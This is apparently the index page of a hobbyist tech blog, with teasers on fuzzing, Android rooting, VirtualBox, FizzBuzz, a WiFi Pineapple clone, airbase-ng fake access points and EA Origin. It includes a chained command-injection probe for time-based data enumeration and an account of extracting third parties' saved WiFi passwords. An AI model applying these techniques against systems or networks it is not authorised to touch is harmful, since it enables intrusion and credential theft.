American Fuzzy Lop (fuzzer)

I’ve been a fan of lcamtuf for years and recently came across an awesome project of his named “american fuzzy lop“.  The basic idea is that it fuzzes input files for the target application, monitoring the execution paths taken – or more importantly crashes detected. Rather than just bruteforcing and hoping for results it ends up navigating different logic paths in the app (eg: after generating a valid image header).

Read More

Huawei MediaPad T1 Tablet

I recently bought a Huawei MediaPad T1 8″ tablet (for a real bargain, thanks to Hot SA Deals). I’m not much of an Android fan, and really hate how manufacturers push their own user interface (usually degrading the experience further), but I must say I’m rather impressed with this device. Although it has Huawei’s “UI Emotion” interface, and few custom system apps, it really is pretty good. This device is also known as the “Huawei Honor T1”.

Because of the special I bought it on, mine came with a bunch of bloatware that I wanted to get off – and it wasn’t (immediately) root’able. Both of these problems were fairly easy to solve thanks to this forum post. The process is straight forward (assuming you have a “S8-701u” device) :

NOTE: This will wipe your device and all data + settings… so make sure you backup anything you want to keep!

  1. Download the official Russian firmware from here (yes, that’s right, Russian)
  2. Extract the zip file, and copy the “dload” folder (buried in some other folders, that will be extracted) to an SD card, then insert it in to the tablet
  3. Power off the tablet, then hold down the “volume down” button and turn it on – release all buttons when the Huawei logo start screen shows
  4. The firmware should start installing and will take a while – you should see a progress bar on the screen . You’ll be prompted to remove the SD card when it’s complete (the device should reboot automatically, and may show the Huawei logo screen for a while during startup)
  5. Once the tablet boots, use the language selector at the top of setup wizard screen to select the desired language (assuming you don’t want Russian)
  6. To root it, head over to TowelRoot.com, click the lambda (image) and choose to open with “Browser” (not Chrome), then run the “.apk” once it’s downloaded
  7. Click the “make it ra1n” button in the app and it should do the rest
  8. Download “Super SU” from the Google Play store (and a “root checker” if need be)

That should be it – worked for me! 🙂

 

Bonus: my device came with two saved wireless access points (“Arbalest” and “Darknet2”) which seem to belong to the reseller and partner that put all the bloatware on my device… getting the passwords to these access points (prior to changing the firmware) was just a matter of running the pre-installed “Backup” app and saving to SD card, then grabbing the config file from the .zip backup on my PC 😉 Now to find out where those access points are located…

Time-based “Blind Command Injection” Un-blinding

While blind command injection web vulnerabilities are incredibly useful, there’s no reason we shouldn’t make them un-blind. Chaining slow running commands to useful commands we can enumerate (or bruteforce) data – such as filenames, paths or strings… similar to what’s done in blind SQL Injection attacks: Blind_SQL_Injection#Time-based.

Consider the following chained commands:

ls -l a* && ping -c 10 127.0.0.1

Read More

VirtualBox tips and tricks

I’ve recently build a rather large VM collection of different operating systems (mostly versions of Windows) using Virtual Box, and here are a few things I learnt along the way. Admittedly these are more aimed at running Windows as your host machine.

1. Shrinking disk images:

While “.vmdk” disk image files may be more compatible with other virtualization software (eg: VMWare), using “.vdi” files can be shrunk to reduce the space used on your host drive. After regular use, or system upgrades, your dynamically expanding disk can end up using more space than necessary, so here’s how to reduce it:

Read More

Fizz Buzz Test

I recently heard about the “Fizz Buzz Test”, a kind of programming “interview” question or challenge. In short, a given number needs to be checked if it’s divisible by 3 or 5 (or 3 and 5) and output either “Fizz”, “Buzz” or “Fizz Buzz” accordingly

There’s a great explanation about the problem, and why it’s not as simple as it seems, at http://c2.com/cgi/wiki?FizzBuzzTest

Here’s my go at it:

Read More

TP-Link TL-WR703N Router as a WiFi Pineapple

There’s a great wireless hacking/security tool called a “WiFi Pineapple“, which costs $100. I found a rather popular blog post, titled “Blue For The Pineapple“, showing how to turn a TP-Link TL-WR703N router in to a WiFi Pineapple clone. The reason you’d want to do this? The TP-Link TL-WR703N router costs a mere $20 (I bought mine from this ebay seller) – not a bad saving!

While that blog post has a lot of great information, I found an easier to follow blog post on doing the same with a TP-LINK TL-MR3020 router, and all of those steps worked great for my router. The “Blue For The Pineapple” post also seems to require some tweaks and hacks to get “infusions” working, while following the instructions in this “TL-MR3020” post things seem to work a lot better.

To make things even easier, and save you some time, I’ve decided to write this blog post and link to pre-made raw USB images you can just write to a USB and (after the steps below) boot.

NOTE: This post is based on Samiux’s  TL-MR3020 blog post, and I don’t understand half of this, I’ve just provided a way to skip the USB drive creation steps, so I can’t really provide any help or support. You could “brick” your router by flashing it with the wrong version of OpenWRT or if you have an unsupported router version – please read all of their documentation, and follow the steps are your own risk!

Basically you need to install OpenWRT on your router, create a USB flash drive from one of the images I provide, configure your router to use the flash drive as it’s main storage, and then configure your computer’s networking. Here we go:

Read More

Installing CyanogenMod 10.0.0 (Android 4.1.2) on LG P970 (and “Security Error” fix)

Thanks to this great forum threat: “The Big N00B how-to!” I’ve managed to get CyanogenMod 10.0.0 (Android 4.1.2)  installed on my LG P970. I spent literally hours just trying to get ClockworkMod installed… ROM Manager seemed to get stuck at 100% of the installation, and nothing else I tried work.

Installing CyanogenMod:

After many attempts and different combinations, what worked for me was downloading the CyanogenMod zip and putting it on my phone’s SD card (while you’re at it, you should probably download the Google Play Store app from http://goo.im/gapps or http://androidjinn.com/download-latest-gapps-or-google-apps.html and put it on your SD card as well), and download the V20 rom from the forum thread above, and flash with SmartFlashTool (see my previous thread about using it).

Read More

LG P970: Upgrading to Android 4.0.4 and Rooting

As mentioned in a previous blog post, I have an LG P970 Android phone… unfortunately LG have taken a while rolling out updates. At the time of writing this post the official software still thinks Android 2.2 is is the latest version available – as it turns out, that’s only for South Africa… some other regions have (“official”) software updates to Android 4.0.4 (Ice Cream Sandwich).

See this link for a list of official downloads: http://www.lg-phones.org/official-stock-lg-optimus-black-firmware-rom.html – note the “V20” or “V30” in the URLs/filenames. The “V10” is the original software that comes on the phone (Android 2.2), “V20” is Android 2.3.4, and “V30” is Android Ice Cream Sandwich (4.0.4). Depending on the country heading you look under, “V30” might not be listed. In my case, South Africa, only V10 and V20 are available, and end with the letter “E” – I thought this might be important (and that I could only use other “E” software versions), but it seems to not be as I was able to update with “V30B” and everything seems to be working fine.

Read More

Fake (wireless) Access Points with airbase-ng

After reading @TroyHunt ‘s blog post about the (wifi) Pineapple he’s been playing with, I got a little jealous and was considering buying one of my own – $100 at HakShop – but didn’t really feel like parting with the money or waiting forever for it to arrive. I looked in to how it works, and what software it uses, and what alternatives there are…

In short “airbase-ng” (one of the “aircrack-ng” tools) seems to cover most of the bases. One of the useful things it does is allow you to create fake access points with a name you specify – used properly this provides some great attack vectors, but it’s also just fun to push your own text (or lots of it) in to nearby people’s wireless access points lists. You do need to run “airmon-ng start <interface>” before using it though.

I wanted to create multiple fake access points, which at the time of writing this “airbase-ng” didn’t support (I don’t think), so had to run the command multiple times. Thinking I may want to do this regularly in the future, I decided to write a simple bash script to simplify the process – having it just take in the name for the access point as a command line option. I noticed that my iPhone only listed 1 faked access point, unless I specified a different mac address for each instance of “airbase-ng” running… so I included some code generate a faked mac address as well (pastebin here: http://pastebin.com/XcMT37T8) :

fakeap01
 

Read More

Why EA and their “Origin” gaming platform suck

I’d heard bad things about EA’s “Origin” gaming platform – an alternative to Valve’s “Steam” – but luckily I haven’t had to use it yet. SimCity 5 changed that, and I made the purchase and downloaded “Origin”.

With the game releasing tomorrow (if you live in the US… or connect via a US VPN) I wanted to make sure I was setup and ready to go, but didn’t see SimCity 5 listed in the Origin client, so logged in to my account and checked my Order History:

OriginSucks2

Read More